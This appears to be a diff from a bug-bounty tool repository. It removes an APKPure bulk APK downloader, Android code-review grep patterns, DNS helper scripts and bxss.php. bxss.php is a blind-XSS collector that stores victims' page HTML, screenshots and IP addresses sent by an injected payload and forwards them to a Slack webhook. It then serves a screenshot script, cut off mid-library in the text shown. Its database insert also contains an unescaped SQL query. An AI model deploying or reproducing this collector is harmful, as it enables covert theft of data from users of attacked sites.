    1  -import math
    2  -from multiprocessing import Process, Queue
    3  -import os
    4  -import os.path
    5  -import re
    6  -import sys
    7  -import time
    8  - 
    9  -try:
    10  - # Python 3
    11  - from queue import Empty as EmptyQueueException
    12  - from queue import Full as FullQueueException
    13  -except ImportError:
    14  - # Python 2
    15  - from Queue import Empty as EmptyQueueException
    16  - from Queue import Full as FullQueueException
    17  - 
    18  -from bs4 import BeautifulSoup
    19  -import requests
    20  - 
    21  - 
    22  -DOMAIN = "https://apkpure.com"
    23  -SEARCH_URL = DOMAIN + "/search?q=%s"
    24  - 
    25  -DOWNLOAD_DIR = "./downloaded/"
    26  -PACKAGE_NAMES_FILE = "package_names.txt"
    27  -OUTPUT_CSV = "output.csv"
    28  - 
    29  - 
    30  -CONCURRENT_DOWNLOADS = 5
    31  -CHUNK_SIZE = 128*1024 # 128 KiB
    32  -PROGRESS_UPDATE_DELAY = 0.25
    33  -PROCESS_TIMEOUT = 10.0
    34  - 
    35  - 
    36  -MSG_ERROR = -1
    37  -MSG_PAYLOAD = 0
    38  -MSG_START = 1
    39  -MSG_PROGRESS = 2
    40  -MSG_END = 3
    41  - 
    42  - 
    43  -class SplitProgBar(object):
    44  - @staticmethod
    45  - def center(text, base):
    46  - if len(text) <= len(base):
    47  - left = (len(base) - len(text)) // 2
    48  - return "%s%s%s" % (base[:left], text, base[left+len(text):])
    49  - else:
    50  - return base
    51  - 
    52  - def __init__(self, n, width):
    53  - self.n = n
    54  - self.sub_width = int(float(width-(n+1))/n)
    55  - self.width = n * (self.sub_width + 1) + 1
    56  - self.progress = [float("NaN")] * n
    57  - 
    58  - def __getitem__(self, ix):
    59  - return self.progress[ix]
    60  - 
    61  - def __setitem__(self, ix, value):
    62  - self.progress[ix] = value
    63  - 
    64  - def render(self):
    65  - bars = []
    66  - for prog in self.progress:
    67  - if math.isnan(prog) or prog < 0.0:
    68  - bars.append(" " * self.sub_width)
    69  - continue
    70  - bar = "=" * int(round(prog*self.sub_width))
    71  - bar += " " * (self.sub_width-len(bar))
    72  - bar = SplitProgBar.center(" %.2f%% " % (prog*100), bar)
    73  - bars.append(bar)
    74  - 
    75  - new_str = "|%s|" % "|".join(bars)
    76  - sys.stdout.write("\r%s" % new_str)
    77  - 
    78  - def clear(self):
    79  - sys.stdout.write("\r%s\r" % (" " * self.width))
    80  - 
    81  - 
    82  -class Counter(object):
    83  - def __init__(self, value = 0):
    84  - self.value = value
    85  - 
    86  - def inc(self, n = 1):
    87  - self.value += n
    88  - 
    89  - def dec(self, n = 1):
    90  - self.value -= n
    91  - 
    92  - @property
    93  - def empty(self):
    94  - return self.value == 0
    95  - 
    96  - 
    97  -def download_process(id_, qi, qo):
    98  - def send_progress(progress):
    99  - try:
    100  - qo.put_nowait((MSG_PROGRESS, (id_, progress)))
    101  - except FullQueueException:
    102  - pass
    103  - 
    104  - def send_error(msg):
    105  - qo.put((MSG_ERROR, (id_, msg)))
    106  - 
    107  - def send_start(pkg_name):
    108  - qo.put((MSG_START, (id_, pkg_name)))
    109  - 
    110  - def send_finished(pkg_name, app_name, size, path, already=False):
    111  - if already:
    112  - qo.put((MSG_END, (id_, pkg_name, app_name, size, path)))
    113  - else:
    114  - qo.put((MSG_PAYLOAD, (id_, pkg_name, app_name, size, path)))
    115  - 
    116  - while True:
    117  - message = qi.get()
    118  - 
    119  - if message[0] == MSG_PAYLOAD:
    120  - package_name, app_name, download_url = message[1]
    121  - elif message[0] == MSG_END:
    122  - break
    123  - 
    124  - try:
    125  - r = requests.get(download_url, stream=True)
    126  - except requests.exceptions.ConnectionError:
    127  - send_error("Connection error")
    128  - continue
    129  - 
    130  - if r.status_code != 200:
    131  - send_error("HTTP Error %d" % r.status_code)
    132  - r.close()
    133  - continue
    134  - 
    135  - content_disposition = r.headers.get("content-disposition", "")
    136  - content_length = int(r.headers.get('content-length', 0))
    137  - 
    138  - filename = re.search(r'filename="(.+)"', content_disposition)
    139  - if filename and filename.groups():
    140  - filename = filename.groups()[0]
    141  - else:
    142  - filename = "%s.apk" % (package_name.replace(".", "_"))
    143  - 
    144  - local_path = os.path.normpath(os.path.join(DOWNLOAD_DIR, filename))
    145  - 
    146  - if os.path.exists(local_path):
    147  - if not os.path.isfile(local_path):
    148  - # Not a file
    149  - send_error("%s is a directory" % local_path)
    150  - r.close()
    151  - continue
    152  - if os.path.getsize(local_path) == content_length:
    153  - # File has likely already been downloaded
    154  - send_finished(
    155  - package_name, app_name, content_length, local_path, True)
    156  - r.close()
    157  - continue
    158  - 
    159  - send_start(package_name)
    160  - 
    161  - size = 0
    162  - t = time.time()
    163  - with open(local_path, "wb+") as f:
    164  - for chunk in r.iter_content(chunk_size=CHUNK_SIZE):
    165  - if chunk:
    166  - size += len(chunk)
    167  - f.write(chunk)
    168  - 
    169  - nt = time.time()
    170  - if nt - t >= PROGRESS_UPDATE_DELAY:
    171  - send_progress(float(size) / content_length)
    172  - t = nt
    173  - 
    174  - send_finished(package_name, app_name, size, local_path)
    175  - 
    176  - 
    177  -def search_process(qi, qo):
    178  - def send_error(msg):
    179  - qo.put((MSG_ERROR, msg))
    180  - 
    181  - def send_payload(pkg_name, app_name, dl_url):
    182  - qo.put((MSG_PAYLOAD, (pkg_name, app_name, dl_url)))
    183  - 
    184  - while True:
    185  - message = qi.get()
    186  - 
    187  - if message[0] == MSG_PAYLOAD:
    188  - package_name = message[1]
    189  - elif message[0] == MSG_END:
    190  - break
    191  - 
    192  - # Search page
    193  - # url = SEARCH_URL % package_name
    194  - # try:
    195  - # r = requests.get(url)
    196  - # except requests.exceptions.ConnectionError:
    197  - # send_error("Connection error")
    198  - # continue
    199  - 
    200  - # if r.status_code != 200:
    201  - # send_error("Could not get search page for %s" % package_name)
    202  - # continue
    203  - 
    204  - # soup = BeautifulSoup(r.text, "html.parser")
    205  - 
    206  - # first_result = soup.find("dl", class_="search-dl")
    207  - # if first_result is None:
    208  - # send_error("Could not find %s" % package_name)
    209  - # continue
    210  - 
    211  - # search_title = first_result.find("p", class_="search-title")
    212  - # search_title_a = search_title.find("a")
    213  - 
    214  - # app_name = search_title.text.strip()
    215  - # app_url = search_title_a.attrs["href"]
    216  - 
    217  - app_url = '/aaaaaaaaaaaaa/' + package_name
    218  - 
    219  - # App page
    220  - url = DOMAIN + app_url
    221  - try:
    222  - r = requests.get(url)
    223  - except requests.exceptions.ConnectionError:
    224  - send_error("Connection error")
    225  - continue
    226  - 
    227  - if r.status_code != 200:
    228  - send_error("Could not get app page for %s" % package_name)
    229  - continue
    230  - 
    231  - soup = BeautifulSoup(r.text, "html.parser")
    232  - app_name = package_name
    233  - # app_name = search_title.text.strip()
    234  - 
    235  - download_button = soup.find("a", {"class":"da"})
    236  - if download_button is None:
    237  - send_error("%s is a paid app. Could not download" % package_name)
    238  - continue
    239  - 
    240  - download_url = download_button.attrs["href"]
    241  - 
    242  - # Download app page
    243  - url = DOMAIN + download_url
    244  - try:
    245  - r = requests.get(url)
    246  - except requests.exceptions.ConnectionError:
    247  - send_error("Connection error")
    248  - continue
    249  - 
    250  - if r.status_code != 200:
    251  - send_error("Could not get app download page for %s" % package_name)
    252  - continue
    253  - 
    254  - soup = BeautifulSoup(r.text, "html.parser")
    255  - 
    256  - download_link = soup.find("a", {"id":"download_link"})
    257  -
    258  - if download_link is None:
    259  - send_error("%s is a paid or region app. Could not download" % package_name)
    260  - continue
    261  - 
    262  - download_apk_url = download_link.attrs["href"]
    263  - 
    264  - send_payload(package_name, app_name, download_apk_url)
    265  - 
    266  - 
    267  -def main():
    268  - # Create the download directory
    269  - if not os.path.exists(DOWNLOAD_DIR):
    270  - os.makedirs(DOWNLOAD_DIR)
    271  - elif not os.path.isdir(DOWNLOAD_DIR):
    272  - print("%s is not a directory" % DOWNLOAD_DIR)
    273  - return -1
    274  - 
    275  - 
    276  - # Read the package names
    277  - if not os.path.isfile(PACKAGE_NAMES_FILE):
    278  - print("Could not find %s" % PACKAGE_NAMES_FILE)
    279  - return -1
    280  - 
    281  - with open(PACKAGE_NAMES_FILE, "r") as f:
    282  - package_names = [line.strip() for line in f.readlines()]
    283  - 
    284  - 
    285  - # CSV file header
    286  - with open(OUTPUT_CSV, "w+") as csv:
    287  - csv.write("App name,Package name,Size,Location\n")
    288  - 
    289  - 
    290  - # Message-passing queues
    291  - search_qi = Queue()
    292  - search_qo = Queue()
    293  - 
    294  - download_qi = Queue()
    295  - download_qo = Queue()
    296  - 
    297  - 
    298  - # Search Process
    299  - search_proc = Process(target=search_process, args=(search_qo, search_qi))
    300  - search_proc.start()
    301  - 
    302  - 
    303  - # Download Processes
    304  - download_procs = []
    305  - for i in range(CONCURRENT_DOWNLOADS):
    306  - download_proc = Process(target=download_process,
    307  - args=(i, download_qo, download_qi))
    308  - download_procs.append(download_proc)
    309  - download_proc.start()
    310  - 
    311  - 
    312  - active_tasks = Counter()
    313  - def new_search_query():
    314  - if package_names:
    315  - search_qo.put((MSG_PAYLOAD, package_names.pop(0)))
    316  - active_tasks.inc()
    317  - return True
    318  - return False
    319  - 
    320  - # Send some queries to the search process
    321  - for _ in range(CONCURRENT_DOWNLOADS + 1):
    322  - new_search_query()
    323  - 
    324  - 
    325  - prog_bars = SplitProgBar(CONCURRENT_DOWNLOADS, 80)
    326  - 
    327  - def log(msg, pb=True):
    328  - prog_bars.clear()
    329  - print(msg)
    330  - if pb:
    331  - prog_bars.render()
    332  - sys.stdout.flush()
    333  - 
    334  - last_message_time = time.time()
    335  - while True:
    336  - if active_tasks.empty:
    337  - log("Done!", False)
    338  - break
    339  - 
    340  - no_message = True
    341  - 
    342  - try:
    343  - # Messages from the search process
    344  - message = search_qi.get(block=False)
    345  - last_message_time = time.time()
    346  - no_message = False
    347  - 
    348  - if message[0] == MSG_PAYLOAD:
    349  - # Donwload URL found => Start a download
    350  - download_qo.put(message)
    351  - log(" Found app for %s" % message[1][0])
    352  - 
    353  - elif message[0] == MSG_ERROR:
    354  - # Error with search query
    355  - log("!!" + message[1])
    356  - active_tasks.dec()
    357  - 
    358  - # Search for another app
    359  - new_search_query()
    360  - except EmptyQueueException:
    361  - pass
    362  - 
    363  - try:
    364  - # Messages from the download processes
    365  - message = download_qi.get(block=False)
    366  - last_message_time = time.time()
    367  - no_message = False
    368  - 
    369  - if message[0] == MSG_PAYLOAD or message[0] == MSG_END:
    370  - # Download finished
    371  - id_, package_name, app_name, size, location = message[1]
    372  - prog_bars[id_] = float("NaN")
    373  - 
    374  - if message[0] == MSG_PAYLOAD:
    375  - log(" Finished downloading %s" % package_name)
    376  - elif message[0] == MSG_END:
    377  - log(" File already downloaded for %s" % package_name)
    378  - 
    379  - # Add row to CSV file
    380  - # with open(OUTPUT_CSV, "a") as csv:
    381  - # csv.write(",".join([
    382  - # '"%s"' % app_name.replace('"', '""'),
    383  - # '"%s"' % package_name.replace('"', '""'),
    384  - # "%d" % size,
    385  - # '"%s"' % location.replace('"', '""')]))
    386  - # csv.write("\n")
    387  - 
    388  - active_tasks.dec()
    389  - 
    390  - # Search for another app
    391  - new_search_query()
    392  - 
    393  - elif message[0] == MSG_START:
    394  - # Download started
    395  - id_, package_name = message[1]
    396  - prog_bars[id_] = 0.0
    397  - log(" Started downloading %s" % package_name)
    398  - 
    399  - elif message[0] == MSG_PROGRESS:
    400  - # Download progress
    401  - id_, progress = message[1]
    402  - prog_bars[id_] = progress
    403  - prog_bars.render()
    404  - 
    405  - elif message[0] == MSG_ERROR:
    406  - # Error during download
    407  - id_, msg = message[1]
    408  - log("!!" + msg)
    409  - prog_bars[id_] = 0.0
    410  - 
    411  - active_tasks.dec()
    412  - 
    413  - # Search for another app
    414  - new_search_query()
    415  - except EmptyQueueException:
    416  - pass
    417  - 
    418  - if no_message:
    419  - if time.time() - last_message_time > PROCESS_TIMEOUT:
    420  - log("!!Timed out after %.2f seconds" % (PROCESS_TIMEOUT), False)
    421  - break
    422  - time.sleep(PROGRESS_UPDATE_DELAY / 2.0)
    423  - 
    424  - # End processes
    425  - search_qo.put((MSG_END, ))
    426  - for _ in range(CONCURRENT_DOWNLOADS):
    427  - download_qo.put((MSG_END, ))
    428  - 
    429  - search_proc.join()
    430  - for download_proc in download_procs:
    431  - download_proc.join()
    432  - 
    433  - return 0
    434  - 
    435  - 
    436  -if __name__ == '__main__':
    437  - sys.exit(main())
  • ■ ■ ■ ■ ■ ■
    apk-regexp.sh
    1  -#!/bin/bash
    2  - 
    3  -target_dir=$1
    4  -script_dir=$(dirname "$(readlink -f "$0")")
    5  - 
    6  -cat $script_dir"/apk-regexp.txt" | while read -r r; do
    7  - title=`echo "$r" | awk -F ";;" '{print $1}'`
    8  - echo "[+] $title"
    9  - reg=`echo "$r" | awk -F ";;" '{print $2}'`
    10  - escape_reg=$reg
    11  - escape_reg=$(echo $escape_reg | sed "s/\"/\\\\\"/g")
    12  - echo "-> $escape_reg"
    13  - egrep --color -ri "$escape_reg" $target_dir
    14  - echo
    15  - echo
    16  -done
    17  - 
  • ■ ■ ■ ■ ■ ■
    apk-regexp.txt
    1  -Buckets/Takeovers;;amazonaws|azurewebsites|cloudapp|trafficmanager|herokuapp|cloudfront|digitaloceanspace|storage\.(cloud|google)|firebaseio\.com
    2  -Webview;;setAllowContent|setAllowFileAccess|setAllowFileAccessFromFileURLs|setAllowUniversalAccessFromFileURLS|setJavascriptEnabled|setPluginState|setSavePassword|JavascriptInterface|loadUrl|setPluginsEnabled|setPluginState|shouldOverrideUrlLoading
    3  -External call;;[^a-z](OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT|PROPFIND|PROPPATCH|MKCOL|COPY|MOVE|LOCK|UNLOCK|VERSION-CONTROL|REPORT|CHECKOUT|CHECKIN|UNCHECKOUT|MKWORKSPACE|UPDATE|LABEL|MERGE|BASELINE-CONTROL|MKACTIVITY|ORDERPATCH|ACL|PATCH|SEARCH|ARBITRARY)[^a-z]"
    4  -External call;;@(OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT|PROPFIND|PROPPATCH|MKCOL|COPY|MOVE|LOCK|UNLOCK|VERSION-CONTROL|REPORT|CHECKOUT|CHECKIN|UNCHECKOUT|MKWORKSPACE|UPDATE|LABEL|MERGE|BASELINE-CONTROL|MKACTIVITY|ORDERPATCH|ACL|PATCH|SEARCH|ARBITRARY)\(
    5  -Parameters;;putExtra|getBundleExtra|getBooleanExtra|getDoubleExtra|getIntExtra|getShortExtra|getStringExtra|getLongExtra|getFloatExtra|getCharExtra|getByteExtra|removeExtra|getCharSequenceExtra|getParcelableExtra|getBooleanArrayExtra|getCharArrayExtra|getByteArrayExtra|getCharSequenceArrayExtra|getCharSequenceArrayListExtra|getDoubleArrayExtra|getFloatArrayExtra|getIntArrayExtra|getIntegerArrayListExtra|getParcelableArrayListExtra|getParcelableArrayExtra|getSerializableExtra|getShortArrayExtra|getStringArrayExtra|getStringArrayListExtra|putIntegerArrayListExtra|putParcelableArrayListExtra|putStringArrayListExtra
    6  -URL Parameters;;[&\?][a-zA-Z0-9\_]+=
    7  -Log call;;Log\.|Timber\.
    8  -Base64 encoded/decoded strings;;base64
    9  -IP adress;;([0-9]{1,3}\s*,\s*){3,})
    10  -Internal Storage;;MODE_|getPreferences|getDefaultSharedPreferences|createTempFile|SQLiteDatabase|openOrCreateDatabase|execSQL|rawQuery
    11  -External Storage;;EXTERNAL_STORAGE|EXTERNAL_CONTENT|getExternal
    12  -Content Provider;;content://
    13  -System;;SystemProperties|\.exec\(
    14  -Intent;;new Intent|new android\.content\.Intent|android\.intent\.action|PendingIntent|sendBroadcast|sendOrderedBroadcast|startActivity|resolveActivity|createChooser|startService|bindService|registerReceiver
    15  -Fragment;;Fragment\.instantiate|FragmentManager|isValidFragment|FragmentTransaction
    16  -SSL Certificate;;CertificatePinner|HostnameVerifier|X509Certificate|CertificatePinner|networkSecurityConfig|network-security-config|onReceivedSslError
    17  -Package install;;vnd\.android\.package-archive
    18  -File manipulation;;(get|set|open|add|new)[a-zA-Z0]*(File|URI|Stream|Image|Document|Dir|Content|Url)[a-zA-Z0]*
    19  - 
  • ■ ■ ■ ■ ■ ■
    arpa.sh
    skipped 35 lines
    36 36  for a in $arpa ; do
    37 37   str=$(echo "$a" | awk -F "YYY" '{print $1}')
    38 38   ip=$(echo "$str" | awk -F "." '{print $4"."$3"."$2"."$1}')
    39  - #echo $ip
    40  - dom=$(echo "$a" | awk -F "YYY" '{print $2}')
    41  - dom=${dom:0:-1}
     39 + # dom=$(echo "$a" | awk -F "YYY" '{print $2}')
     40 + # dom=${dom:0:-1}
    42 41   #echo $dom
    43  - echo $ip" "$dom
     42 + echo $ip
     43 + # echo $ip" "$dom
    44 44  done
    45 45   
    46 46  exit
    skipped 1 lines
  • ■ ■ ■ ■ ■ ■
    bbhost.sh
    1 1  #!/bin/bash
    2 2   
     3 +# multithreaded host command
     4 + 
    3 5  if [ $# -lt 1 ] ; then
    4 6   input="hosts"
    5 7  else
    skipped 11 lines
    17 19  parallel -j 20 "host " :::: $input | tee -a $output
    18 20  exit;
    19 21   
    20  -for h in $(cat $input) ; do
    21  - host $h | tee -a $output
    22  - echo "" | tee -a $output
    23  -done
     22 +# for h in $(cat $input) ; do
     23 +# host $h | tee -a $output
     24 +# echo "" | tee -a $output
     25 +# done
    24 26   
  • ■ ■ ■ ■ ■ ■
    bxss.php
    1  -<?php
    2  - 
    3  -ini_set('display_errors', 0 );
    4  -ini_set('display_startup_errors', 0 );
    5  -error_reporting( 0 );
    6  - 
    7  - 
    8  -$_config = [
    9  - 'image_path' => 'images/', // relative please!
    10  - 'report' => [
    11  - 'file' => [
    12  - 'enabled' => false,
    13  - 'path' => 'xss.log',
    14  - ],
    15  - 'mail' => [ // not implemented yet
    16  - 'enabled' => false,
    17  - 'to' => '',
    18  - ],
    19  - 'sqlite' => [
    20  - 'enabled' => false,
    21  - 'path' => 'xss.db',
    22  - 
    23  - ],
    24  - 'slack' => [
    25  - 'enabled' => false,
    26  - 'webhook_url' => '',
    27  - ],
    28  - ],
    29  -];
    30  - 
    31  - 
    32  -class Reporting
    33  -{
    34  - public static function getClientIp()
    35  - {
    36  - if( isset($_SERVER['HTTP_X_FORWARDED_FOR']) ) {
    37  - return filter_var( $_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP );
    38  - }
    39  - 
    40  - if( isset($_SERVER['HTTP_CLIENT_IP']) ) {
    41  - return filter_var( $_SERVER['HTTP_CLIENT_IP'], FILTER_VALIDATE_IP );
    42  - }
    43  - 
    44  - return filter_var( $_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP );
    45  - }
    46  - 
    47  - public static function report_file( $config, $t_datas ) {
    48  - $log = str_repeat('-',10).' '.$t_datas['date'].' '.str_repeat('-',50)."\n\n";
    49  - unset( $t_datas['id'] );
    50  - unset( $t_datas['date'] );
    51  - foreach( $t_datas as $k=>$v ) {
    52  - $log .= strtoupper( $k ).":\n";
    53  - $log .= $v."\n\n";
    54  - }
    55  - file_put_contents( $config['path'], $log, FILE_APPEND | LOCK_EX );
    56  - }
    57  - public static function report_mail( $config, $t_datas ) {
    58  - // todo
    59  - }
    60  - public static function report_sqlite( $config, $t_datas ) {
    61  - $db = new SQLite3( $config['path'] );
    62  - $q = 'SELECT COUNT(*) FROM bxss';
    63  - $result = @$db->query( $q );
    64  - 
    65  - if( $result === false ) {
    66  - $db->exec( 'CREATE TABLE bxss (id STRING PRIMARY KEY, created_at DATETIME, datas TEXT)' );
    67  - $db->query( $q );
    68  - }
    69  - 
    70  - $db->query( "INSERT INTO bxss (id, created_at, datas) VALUES('".$t_datas['id']."', '".$t_datas['date']."', '".base64_encode(json_encode($t_datas))."')" );
    71  - }
    72  - public static function report_slack( $config, $t_datas ) {
    73  - $log = '*'.str_repeat('-',10).' '.$t_datas['date'].' '.str_repeat('-',50)."*\n\n";
    74  - if( isset($t_datas['screenshot']) ) {
    75  - $screenshot = $t_datas['screenshot'];
    76  - unset($t_datas['screenshot']);
    77  - }
    78  - if( isset($t_datas['document_html']) ) {
    79  - $document_html = $t_datas['document_html'];
    80  - unset( $t_datas['document_html'] );
    81  - $document_save = $t_datas['document_save'];
    82  - unset( $t_datas['document_save'] );
    83  - }
    84  - unset( $t_datas['id'] );
    85  - unset( $t_datas['date'] );
    86  - foreach( $t_datas as $k=>$v ) {
    87  - $log .= strtoupper( $k )."\n";
    88  - $log .= '```'.$v."```\n\n";
    89  - }
    90  - $t_json = [];
    91  - $t_json['text'] = $log;
    92  - $t_json['attachments'] = [];
    93  - if( isset($screenshot) ) {
    94  - $attachment = [];
    95  - $attachment['pretext'] = 'SCREENSHOT';
    96  - $attachment['title'] = $attachment['title_link'] = $attachment['image_url'] = $screenshot;
    97  - $t_json['attachments'][] = $attachment;
    98  - }
    99  - if( isset($document_html) ) {
    100  - $attachment = [];
    101  - $attachment['title'] = $attachment['title_link'] = $document_save;
    102  - $attachment['pretext'] = 'HTML_DOCUMENT';
    103  - $attachment['text'] = $document_html;
    104  - $t_json['attachments'][] = $attachment;
    105  - }
    106  - $c = curl_init();
    107  - curl_setopt( $c, CURLOPT_URL, $config['webhook_url'] );
    108  - curl_setopt( $c, CURLOPT_POST, true );
    109  - curl_setopt( $c, CURLOPT_HTTPHEADER, ['Content-type: application/json'] );
    110  - curl_setopt( $c, CURLOPT_POSTFIELDS, json_encode($t_json) );
    111  - curl_setopt( $c, CURLOPT_RETURNTRANSFER, true );
    112  - curl_exec( $c );
    113  - }
    114  - public static function save_html( $path, $id, $content ) {
    115  - $path_abs = dirname($_SERVER['SCRIPT_FILENAME']).'/'.trim($path,'/');
    116  - if( !is_dir($path_abs) ) {
    117  - if( !mkdir($path_abs,0777,true) ) {
    118  - return '';
    119  - }
    120  - }
    121  - $file = $id.'.html';
    122  - $path_abs = $path_abs.'/'.$file;
    123  - if( file_put_contents($path_abs,$content) !== false ) {
    124  - $url = $_SERVER['REQUEST_SCHEME'].'://'.$_SERVER['SERVER_NAME'].rtrim(dirname($_SERVER['SCRIPT_NAME']),'/').'/'.trim($path,'/').'/'.$file;
    125  - return $url;
    126  - } else {
    127  - return '';
    128  - }
    129  - }
    130  - public static function save_screenshot( $path, $id, $content ) {
    131  - $path_abs = dirname($_SERVER['SCRIPT_FILENAME']).'/'.trim($path,'/');
    132  - if( !is_dir($path_abs) ) {
    133  - if( !mkdir($path_abs,0777,true) ) {
    134  - return '';
    135  - }
    136  - }
    137  - $file = $id.'.png';
    138  - $path_abs = $path_abs.'/'.$file;
    139  - $content = base64_decode( substr( $content, strlen('data:image/png;base64,') ) );
    140  - if( file_put_contents($path_abs,$content) !== false ) {
    141  - $url = $_SERVER['REQUEST_SCHEME'].'://'.$_SERVER['SERVER_NAME'].rtrim(dirname($_SERVER['SCRIPT_NAME']),'/').'/'.trim($path,'/').'/'.$file;
    142  - return $url;
    143  - } else {
    144  - return '';
    145  - }
    146  - }
    147  -}
    148  - 
    149  -if( isset($_POST['datas']) )
    150  -{
    151  - // handling datas
    152  - $input = file_get_contents('php://input');
    153  - $input = substr( $input, strpos($input,'=')+1 );
    154  - $t_datas = json_decode( $input, true );
    155  - $t_datas['client_ip'] = Reporting::getClientIp();
    156  - $id = $t_datas['id'] = md5( uniqid(true) );
    157  - $date = $t_datas['date'] = date( 'Y-m-d H:i:s' );
    158  - 
    159  - if( isset($t_datas['document_html']) && strlen($t_datas['document_html']) ) {
    160  - $t_datas['document_save'] = Reporting::save_html( $_config['image_path'], $id, $t_datas['document_html'] );
    161  - $t_datas['document_html'] = substr( $t_datas['document_html'], 0, 5000 );
    162  - } else {
    163  - unset( $t_datas['document_html'] );
    164  - }
    165  - 
    166  - if( isset($t_datas['screenshot']) && strlen($t_datas['screenshot']) ) {
    167  - $t_datas['screenshot'] = Reporting::save_screenshot( $_config['image_path'], $id, $t_datas['screenshot'] );
    168  - } else {
    169  - unset( $t_datas['screenshot'] );
    170  - }
    171  - 
    172  - // reporting
    173  - foreach( $_config['report'] as $method=>$config ) {
    174  - $function = 'report_'.$method;
    175  - if( method_exists('Reporting',$function) && isset($config['enabled']) && $config['enabled'] ) {
    176  - Reporting::$function( $config, $t_datas );
    177  - }
    178  - }
    179  - 
    180  - exit();
    181  -}
    182  - 
    183  -header('Content-Type: application/javascript');
    184  - 
    185  -?>
    186  - 
    187  -// https://github.com/niklasvh/html2canvas
    188  -!function(t,e,n){function r(t,e,n,r){return c(t,n,r,e).then(function(a){E("Document cloned");var c="["+Ee+"='true']";t.querySelector(c).removeAttribute(Ee);var h=a.contentWindow,u=h.document.querySelector(c),p=new de(h.document),l=new m(e,p),d=B(u),f="view"===e.type?Math.min(d.width,n):o(),g="view"===e.type?Math.min(d.height,r):s(),y=new xe(f,g,l,e),v=new P(u,y,p,l,e);return v.ready.then(function(){E("Finished rendering");var t="view"===e.type||u!==h.document.body&&u!==h.document.documentElement?i(y.canvas,d):y.canvas;return e.removeContainer&&(a.parentNode.removeChild(a),E("Cleaned up container")),t})})}function i(t,n){var r=e.createElement("canvas"),i=Math.min(t.width-1,Math.max(0,n.left)),o=Math.min(t.width,Math.max(1,n.left+n.width)),s=Math.min(t.height-1,Math.max(0,n.top)),a=Math.min(t.height,Math.max(1,n.top+n.height)),c=r.width=o-i,h=r.height=a-s;return E("Cropping canvas at:","left:",n.left,"top:",n.top,"width:",n.width,"height:",n.height),E("Resulting crop with width",c,"and height",h," with x",i,"and y",s),r.getContext("2d").drawImage(t,i,s,c,h,0,0,c,h),r}function o(){return Math.max(Math.max(e.body.scrollWidth,e.documentElement.scrollWidth),Math.max(e.body.offsetWidth,e.documentElement.offsetWidth),Math.max(e.body.clientWidth,e.documentElement.clientWidth))}function s(){return Math.max(Math.max(e.body.scrollHeight,e.documentElement.scrollHeight),Math.max(e.body.offsetHeight,e.documentElement.offsetHeight),Math.max(e.body.clientHeight,e.documentElement.clientHeight))}function a(){return"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"}function c(e,n,r,i){var o=e.documentElement.cloneNode(!0),s=e.createElement("iframe"); return s.style.visibility="hidden",s.style.position="absolute",s.style.left=s.style.top="-10000px",s.width=n,s.height=r,s.scrolling="no",e.body.appendChild(s),new Promise(function(e){var n=s.contentWindow.document;s.contentWindow.onload=s.onload=function(){e(s)},n.open(),n.write("<!DOCTYPE html>"),n.close(),n.replaceChild(h(n.adoptNode(o)),n.documentElement),"view"===i.type&&s.contentWindow.scrollTo(t.pageXOffset,t.pageYOffset)})}function h(t){return[].slice.call(t.childNodes,0).filter(u).forEach(function(e){"SCRIPT"===e.tagName?t.removeChild(e):h(e)}),t}function u(t){return t.nodeType===Node.ELEMENT_NODE}function p(t){if(this.src=t,E("DummyImageContainer for",t),!this.promise||!this.image){E("Initiating DummyImageContainer"),p.prototype.image=new Image;var e=this.image;p.prototype.promise=new Promise(function(t,n){e.onload=t,e.onerror=n,e.src=a(),e.complete===!0&&t(e)})}}function l(t,n){var r,i,o=e.createElement("div"),s=e.createElement("img"),c=e.createElement("span"),h="Hidden Text";o.style.visibility="hidden",o.style.fontFamily=t,o.style.fontSize=n,o.style.margin=0,o.style.padding=0,e.body.appendChild(o),s.src=a(),s.width=1,s.height=1,s.style.margin=0,s.style.padding=0,s.style.verticalAlign="baseline",c.style.fontFamily=t,c.style.fontSize=n,c.style.margin=0,c.style.padding=0,c.appendChild(e.createTextNode(h)),o.appendChild(c),o.appendChild(s),r=s.offsetTop-c.offsetTop+1,o.removeChild(c),o.appendChild(e.createTextNode(h)),o.style.lineHeight="normal",s.style.verticalAlign="super",i=s.offsetTop-o.offsetTop+1,e.body.removeChild(o),this.baseline=r,this.lineWidth=1,this.middle=i}function d(){this.data={}}function f(t){this.src=t.value,this.colorStops=[],this.type=null,this.x0=.5,this.y0=.5,this.x1=.5,this.y1=.5,this.promise=Promise.resolve(!0)}function g(t,e){this.src=t,this.image=new Image;var n=this;this.tainted=null,this.promise=new Promise(function(r,i){n.image.onload=r,n.image.onerror=i,e&&(n.image.crossOrigin="anonymous"),n.image.src=t,n.image.complete===!0&&r(n.image)})["catch"](function(){var e=new p(t);return e.promise.then(function(t){n.image=t})})}function m(e,n){this.link=null,this.options=e,this.support=n,this.origin=t.location.protocol+t.location.hostname+t.location.port}function y(t){return"IMG"===t.node.nodeName}function v(t){return"svg"===t.node.nodeName}function w(t){return{args:[t.node.src],method:"url"}}function b(t){return{args:[t.node],method:"svg"}}function x(t){f.apply(this,arguments),this.type=this.TYPES.LINEAR;var e=null===t.args[0].match(this.stepRegExp);e?t.args[0].split(" ").reverse().forEach(function(t){switch(t){case"left":this.x0=0,this.x1=1;break;case"top":this.y0=0,this.y1=1;break;case"right":this.x0=1,this.x1=0;break;case"bottom":this.y0=1,this.y1=0;break;case"to":var e=this.y0,n=this.x0;this.y0=this.y1,this.x0=this.x1,this.x1=n,this.y1=e;break;default:var r=t.match(this.angleRegExp);if(r)switch(r[2]){case"deg":var i=parseFloat(r[1]),o=i/(180/Math.PI),s=Math.tan(o);this.y0=2/Math.tan(s)/2,this.x0=0,this.x1=1,this.y1=0}}},this):(this.y0=0,this.y1=1),this.colorStops=t.args.slice(e?1:0).map(function(t){var e=t.match(this.stepRegExp);return{color:e[1],stop:"%"===e[3]?e[2]/100:null}},this),null===this.colorStops[0].stop&&(this.colorStops[0].stop=0),null===this.colorStops[this.colorStops.length-1].stop&&(this.colorStops[this.colorStops.length-1].stop=1),this.colorStops.forEach(function(t,e){null===t.stop&&this.colorStops.slice(e).some(function(n,r){return null!==n.stop?(t.stop=(n.stop-this.colorStops[e-1].stop)/(r+1)+this.colorStops[e-1].stop,!0):!1},this)},this)}function 